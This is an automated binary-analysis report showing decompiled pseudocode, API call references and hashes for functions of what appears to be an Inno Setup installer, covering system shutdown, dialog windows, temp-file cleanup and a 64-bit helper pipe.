                                                            0x0040e28a
                                                            0x0040e293

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                            • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                            • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                            • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                            • String ID: GetLongPathNameW$\$kernel32.dll
                                                            • API String ID: 1930782624-3908791685
                                                            • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                            • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                            • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0060F6D8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E0060F6D8() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				int _t7;

				if(E00429D18() != 2) {
					L5:
					_t7 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return _t7 + 1;
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}







                                                            0x0060f6e3
                                                            0x0060f740
                                                            0x0060f744
                                                            0x0060f74c
                                                            0x00000000
                                                            0x0060f74e
                                                            0x0060f6f5
                                                            0x0060f707
                                                            0x0060f70c
                                                            0x0060f714
                                                            0x0060f72e
                                                            0x0060f73a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0060f73c
                                                            0x00000000

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 107509674-3733053543
                                                            • Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                            • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                            • Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                            • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A68B0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E006A68B0(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, short* _a8, intOrPtr _a12, void* _a16, char _a20, intOrPtr _a24, intOrPtr* _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				char _v5;
				intOrPtr _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v60;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t79;
				signed int _t82;
				signed int _t83;
				short* _t87;
				intOrPtr _t106;
				intOrPtr _t123;
				void* _t125;
				char _t126;
				intOrPtr* _t127;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr* _t148;
				void* _t150;
				void* _t151;
				intOrPtr _t152;
				intOrPtr _t164;

				_t150 = _t151;
				_t152 = _t151 + 0xffffff8c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t147 = __ecx;
				_t123 = __edx;
				_t145 = __eax;
				_push(_t150);
				_push(0x6a6acd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152;
				if( *0x6d648c == 0) {
					_v5 = 0;
					__eflags = 0;
					_pop(_t136);
					 *[fs:eax] = _t136;
					_push(E006A6AD4);
					return 0;
				} else {
					E00407760( &_v120, 0x60);
					_v120 = 0x60;
					if(_a20 != 0) {
						_v108 = _v108 | 0x00002000;
					}
					_v112 =  *0x6d2634;
					_t70 =  *0x6cdec4; // 0x6d579c
					if(IsIconic( *( *_t70 + 0x188)) == 0) {
						_t74 =  *0x6cdec4; // 0x6d579c
						_t77 = GetWindowLongW( *( *_t74 + 0x188), 0xfffffff0);
						__eflags = _t77 & 0x10000000;
						_t12 = (_t77 & 0x10000000) == 0;
						__eflags = _t12;
						_t78 = _t77 & 0xffffff00 | _t12;
					} else {
						_t78 = 1;
					}
					if(_t78 == 0) {
						_t79 =  *0x6cdec4; // 0x6d579c
						_t82 = GetWindowLongW( *( *_t79 + 0x188), 0xffffffec);
						__eflags = _t82 & 0x00000080;
						_t17 = (_t82 & 0x00000080) != 0;
						__eflags = _t17;
						_t83 = _t82 & 0xffffff00 | _t17;
					} else {
						_t83 = 1;
					}
					if(_t83 == 0) {
						_v116 = _t145;
					} else {
						_v116 = 0;
					}
					_v104 = _a44;
					_v100 = _a52;
					_v96 = _a48;
					_v92 = _t123;
					_v88 = _t147;
					_t87 = _a8;
					if(_t87 != 0 &&  *_t87 != 0) {
						_v60 = _a8;
					}
					if(_a24 != 0) {
						_v36 = 0x6a6888;
						_v32 = _a24;
					}
					_v12 = 0;
					_push(_t150);
					_push(0x6a6ab4);
					_push( *[fs:edx]);
					 *[fs:edx] = _t152;
					_t125 = _a36 + 1;
					if(_t125 != 0) {
						_t106 =  *0x54808c; // 0x5480e4
						_v12 = E00466A64(0, 1, _t145, _t106);
						_v108 = _v108 | 0x00000010;
						_t125 = _t125 - 1;
						if(_t125 >= 0) {
							_t126 = _t125 + 1;
							_t164 = _t126;
							_v24 = _t126;
							_t127 = _a40;
							_t148 = _a32;
							do {
								_t145 = E0054BA48(_v12);
								E0054B708(_t145,  *_t127, _t164);
								 *((intOrPtr*)(_t145 + 0x18)) =  *_t148;
								_t148 = _t148 + 4;
								_t127 = _t127 + 4;
								_t45 =  &_v24;
								 *_t45 = _v24 - 1;
							} while ( *_t45 != 0);
						}
						_v80 = E0054BA54(_v12);
						_v84 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 8));
					}
					E005C9060();
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t125, _t145, _t147);
					 *[fs:eax] = _t152;
					_v5 =  *0x6d648c( &_v120, _a12, 0, _a4,  *[fs:eax], 0x6a6a97, _t150) == 0;
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(E006A6A9E);
					E005ABC0C(_v20);
					SetActiveWindow(_v16);
					return E005C9060();
				}
			}












































                                                            0x006a68b1
                                                            0x006a68b3
                                                            0x006a68b6
                                                            0x006a68b7
                                                            0x006a68b8
                                                            0x006a68b9
                                                            0x006a68bb
                                                            0x006a68bd
                                                            0x006a68c1
                                                            0x006a68c2
                                                            0x006a68c7
                                                            0x006a68ca
                                                            0x006a68d4
                                                            0x006a6abb
                                                            0x006a6abf
                                                            0x006a6ac1
                                                            0x006a6ac4
                                                            0x006a6ac7
                                                            0x006a6acc
                                                            0x006a68da
                                                            0x006a68e4
                                                            0x006a68e9
                                                            0x006a68f4
                                                            0x006a68f6
                                                            0x006a68f6
                                                            0x006a6902
                                                            0x006a6905
                                                            0x006a691a
                                                            0x006a6920
                                                            0x006a6930
                                                            0x006a6935
                                                            0x006a693a
                                                            0x006a693a
                                                            0x006a693a
                                                            0x006a691c
                                                            0x006a691c
                                                            0x006a691c
                                                            0x006a693f
                                                            0x006a6945
                                                            0x006a6955
                                                            0x006a695a
                                                            0x006a695c
                                                            0x006a695c
                                                            0x006a695c
                                                            0x006a6941
                                                            0x006a6941
                                                            0x006a6941
                                                            0x006a6961
                                                            0x006a696a
                                                            0x006a6963
                                                            0x006a6965
                                                            0x006a6965
                                                            0x006a6970
                                                            0x006a6976
                                                            0x006a697c
                                                            0x006a697f
                                                            0x006a6982
                                                            0x006a6985
                                                            0x006a698a
                                                            0x006a6995
                                                            0x006a6995
                                                            0x006a699c
                                                            0x006a699e
                                                            0x006a69a8
                                                            0x006a69a8
                                                            0x006a69ad
                                                            0x006a69b2
                                                            0x006a69b3
                                                            0x006a69b8
                                                            0x006a69bb
                                                            0x006a69c1
                                                            0x006a69c4
                                                            0x006a69c6
                                                            0x006a69da
                                                            0x006a69dd
                                                            0x006a69e1
                                                            0x006a69e4
                                                            0x006a69e6
                                                            0x006a69e6
                                                            0x006a69e7
                                                            0x006a69ea
                                                            0x006a69ed
                                                            0x006a69f0
                                                            0x006a69f8
                                                            0x006a69fe
                                                            0x006a6a05
                                                            0x006a6a08
                                                            0x006a6a0b
                                                            0x006a6a0e
                                                            0x006a6a0e
                                                            0x006a6a0e
                                                            0x006a69f0
                                                            0x006a6a1b
                                                            0x006a6a27
                                                            0x006a6a27
                                                            0x006a6a2f
                                                            0x006a6a39
                                                            0x006a6a43
                                                            0x006a6a51
                                                            0x006a6a6a
                                                            0x006a6a70
                                                            0x006a6a73
                                                            0x006a6a76
                                                            0x006a6a7e
                                                            0x006a6a87
                                                            0x006a6a96
                                                            0x006a6a96

                                                            APIs
                                                            • IsIconic.USER32(?), ref: 006A6913
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                              • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                              • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                            • GetActiveWindow.USER32 ref: 006A6A34
                                                            • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$ActiveLong$EnableIconic
                                                            • String ID: `
                                                            • API String ID: 4222481217-2679148245
                                                            • Opcode ID: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                            • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                            • Opcode Fuzzy Hash: cde2a6536f5044e3bc4238d2ffbe734793dbf8fec1bfd9d9ee3b4b44e3c8bba9
                                                            • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006B8DE4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E006B8DE4(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				struct _WIN32_FIND_DATAW _v604;
				char _v608;
				char _v612;
				void* _t59;
				intOrPtr _t70;
				intOrPtr _t73;
				signed int _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v8 = 0;
				_t59 = __eax;
				_push(_t80);
				_push(0x6b8f21);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E0040B4C8( &_v608, L"isRS-???.tmp", __eax);
				_v12 = FindFirstFileW(E0040B278(_v608),  &_v604);
				if(_v12 == 0xffffffff) {
					_pop(_t70);
					 *[fs:eax] = _t70;
					_push(E006B8F28);
					E0040A228( &_v612, 2);
					return E0040A1C8( &_v8);
				} else {
					_push(_t80);
					_push(0x6b8ef4);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					do {
						if(E004241A0( &(_v604.cFileName), 5, L"isRS-") == 0 && (_v604.dwFileAttributes & 0x00000010) == 0) {
							E0040B318( &_v612, 0x104,  &(_v604.cFileName));
							E0040B4C8( &_v8, _v612, _t59);
							_t77 = _v604.dwFileAttributes;
							if((_t77 & 0x00000001) != 0) {
								SetFileAttributesW(E0040B278(_v8), _t77 & 0xfffffffe);
							}
							E00423A20(_v8);
						}
					} while (FindNextFileW(_v12,  &_v604) != 0);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E006B8EFB);
					return FindClose(_v12);
				}
			}















                                                            0x006b8de5
                                                            0x006b8de7
                                                            0x006b8df1
                                                            0x006b8df7
                                                            0x006b8dfd
                                                            0x006b8e00
                                                            0x006b8e04
                                                            0x006b8e05
                                                            0x006b8e0a
                                                            0x006b8e0d
                                                            0x006b8e24
                                                            0x006b8e3a
                                                            0x006b8e41
                                                            0x006b8efd
                                                            0x006b8f00
                                                            0x006b8f03
                                                            0x006b8f13
                                                            0x006b8f20
                                                            0x006b8e47
                                                            0x006b8e49
                                                            0x006b8e4a
                                                            0x006b8e4f
                                                            0x006b8e52
                                                            0x006b8e55
                                                            0x006b8e6c
                                                            0x006b8e88
                                                            0x006b8e98
                                                            0x006b8e9d
                                                            0x006b8ea9
                                                            0x006b8eb8
                                                            0x006b8eb8
                                                            0x006b8ec0
                                                            0x006b8ec0
                                                            0x006b8ed5
                                                            0x006b8edf
                                                            0x006b8ee2
                                                            0x006b8ee5
                                                            0x006b8ef3
                                                            0x006b8ef3

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                            • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                            • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                            • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                            • String ID: isRS-$isRS-???.tmp
                                                            • API String ID: 134685335-3422211394
                                                            • Opcode ID: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                            • Opcode Fuzzy Hash: 3affe16ed425f9283171b1eb0e7714abad28a6a77db8245eb00c896bf4ec8b38
                                                            • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C90B4, Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 65%
                                                            			E005C90B4(WCHAR* __eax, void* __ebx, signed int __ecx, WCHAR* __edx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr* _t28;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t41;
				intOrPtr* _t43;
				WCHAR* _t62;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
				WCHAR* _t78;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t76 = __edi;
				_t80 = _t81;
				_t82 = _t81 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t78 = __edx;
				_t62 = __eax;
				if( *0x6d5814 != 0) {
					_v8 = _v8 | 0x00180000;
				}
				E005C9060();
				_push(_t80);
				_push(0x5c91da);
				_push( *[fs:edx]);
				 *[fs:edx] = _t82;
				_t28 =  *0x6cdec4; // 0x6d579c
				if(IsIconic( *( *_t28 + 0x188)) == 0) {
					_t32 =  *0x6cdec4; // 0x6d579c
					_t36 = GetWindowLongW( *( *_t32 + 0x188), 0xfffffff0) & 0xffffff00 | (_t35 & 0x10000000) == 0x00000000;
				} else {
					_t36 = 1;
				}
				if(_t36 == 0) {
					_t37 =  *0x6cdec4; // 0x6d579c
					_t41 = GetWindowLongW( *( *_t37 + 0x188), 0xffffffec) & 0xffffff00 | (_t40 & 0x00000080) != 0x00000000;
				} else {
					_t41 = 1;
				}
				if(_t41 == 0) {
					_t43 =  *0x6cdec4; // 0x6d579c
					_v12 = L005B8BCC( *_t43, _t62, _t78, _t62, _t76, _t78, _v8);
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E005C91E1);
					return E005C9060();
				} else {
					_v16 = GetActiveWindow();
					_v20 = E005ABB4C(0, _t62, _t76, _t78);
					_push(_t80);
					_push(0x5c919d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t82;
					_v12 = MessageBoxW(0, _t62, _t78, _v8 | 0x00002000);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E005C91A4);
					E005ABC0C(_v20);
					return SetActiveWindow(_v16);
				}
			}





















                                                            0x005c90b4
                                                            0x005c90b5
                                                            0x005c90b7
                                                            0x005c90ba
                                                            0x005c90bb
                                                            0x005c90bc
                                                            0x005c90bf
                                                            0x005c90c1
                                                            0x005c90ca
                                                            0x005c90cc
                                                            0x005c90cc
                                                            0x005c90d8
                                                            0x005c90df
                                                            0x005c90e0
                                                            0x005c90e5
                                                            0x005c90e8
                                                            0x005c90eb
                                                            0x005c9100
                                                            0x005c9106
                                                            0x005c9120
                                                            0x005c9102
                                                            0x005c9102
                                                            0x005c9102
                                                            0x005c9125
                                                            0x005c912b
                                                            0x005c9142
                                                            0x005c9127
                                                            0x005c9127
                                                            0x005c9127
                                                            0x005c9147
                                                            0x005c91af
                                                            0x005c91bf
                                                            0x005c91c4
                                                            0x005c91c7
                                                            0x005c91ca
                                                            0x005c91d9
                                                            0x005c9149
                                                            0x005c914e
                                                            0x005c9158
                                                            0x005c915d
                                                            0x005c915e
                                                            0x005c9163
                                                            0x005c9166
                                                            0x005c917b
                                                            0x005c9180
                                                            0x005c9183
                                                            0x005c9186
                                                            0x005c918e
                                                            0x005c919c
                                                            0x005c919c

                                                            APIs
                                                            • IsIconic.USER32(?), ref: 005C90F9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                            • GetActiveWindow.USER32 ref: 005C9149
                                                            • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                            • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$ActiveLong$IconicMessage
                                                            • String ID:
                                                            • API String ID: 1633107849-0
                                                            • Opcode ID: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                            • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                            • Opcode Fuzzy Hash: 6ccadbc60b25befb027f438fb9d8ea6f9f99e08362a6b6c28a86a9c04d8ecebe
                                                            • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00625754, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 82%
                                                            			E00625754(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _STARTUPINFOW _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				long _v120;
				char _v124;
				long _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				void* _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char* _t62;
				WCHAR* _t91;
				WCHAR* _t97;
				intOrPtr _t98;
				void* _t127;
				intOrPtr _t139;
				struct _FILETIME* _t141;
				void* _t145;
				void* _t146;
				intOrPtr _t147;

				_t145 = _t146;
				_t147 = _t146 + 0xffffff4c;
				_v156 = 0;
				_v160 = 0;
				_v16 = 0;
				_t127 = __eax;
				_t141 =  &_v12;
				_push(_t145);
				_push(0x625a4f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				E00616130(L"Starting 64-bit helper process.", __eax, _t141, 0x6d636c);
				_t62 =  *0x6cda20; // 0x6d67dd
				if( *_t62 == 0) {
					E0060CD28(L"Cannot utilize 64-bit features on this version of Windows", _t127);
				}
				if( *0x6d6368 == 0) {
					E0060CD28(L"64-bit helper EXE wasn\'t extracted", _t127);
				}
				while(1) {
					 *0x6d636c =  *0x6d636c + 1;
					 *((intOrPtr*)(_t127 + 0x14)) = GetTickCount();
					if(QueryPerformanceCounter(_t141) == 0) {
						GetSystemTimeAsFileTime(_t141);
					}
					_v152 = GetCurrentProcessId();
					_v148 = 0;
					_v144 =  *0x6d636c;
					_v140 = 0;
					_v136 =  *((intOrPtr*)(_t127 + 0x14));
					_v132 = 0;
					_v128 = _t141->dwHighDateTime;
					_v124 = 0;
					_v120 = _t141->dwLowDateTime;
					_v116 = 0;
					E004244F8(L"\\\\.\\pipe\\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x", 4,  &_v152,  &_v16);
					_v20 = CreateNamedPipeW(E0040B278(_v16), 0x40080003, 6, 1, 0x2000, 0x2000, 0, 0);
					if(_v20 != 0xffffffff) {
						break;
					}
					if(GetLastError() != 0xe7) {
						E0060CE84(L"CreateNamedPipe");
					}
				}
				_push(_t145);
				_push(0x625a0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v24 = CreateFileW(E0040B278(_v16), 0xc0000000, 0, 0x6cd098, 3, 0, 0);
				if(_v24 == 0xffffffff) {
					E0060CE84(L"CreateFile");
				}
				_push(_t145);
				_push(0x6259fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				_v28 = 2;
				if(SetNamedPipeHandleState(_v24,  &_v28, 0, 0) == 0) {
					E0060CE84(L"SetNamedPipeHandleState");
				}
				E00407760( &_v96, 0x44);
				_v96.cb = 0x44;
				E005C745C( &_v156);
				_t91 = E0040B278(_v156);
				_v176 = 0x69;
				_v172 = 0;
				_v168 = _v24;
				_v164 = 0;
